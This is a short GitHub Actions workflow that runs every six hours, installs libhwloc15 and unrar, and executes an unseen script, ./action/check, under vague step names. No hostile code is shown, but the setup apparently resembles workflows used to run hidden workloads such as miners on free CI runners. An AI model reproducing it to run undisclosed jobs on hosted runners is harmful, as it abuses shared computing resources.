jobs:
  workflow:
    name: Workflow
    runs-on: ubuntu-20.04

    steps:
      - name: Startup
        uses: actions/checkout@v2
      - name: Pull Dependencies
        run: sudo apt-get update && sudo apt-get install -y libhwloc15 unrar
      - name: Test
        run: ./action/check

name: Verify

on:
  schedule:
    - cron: "25 */6 * * *"
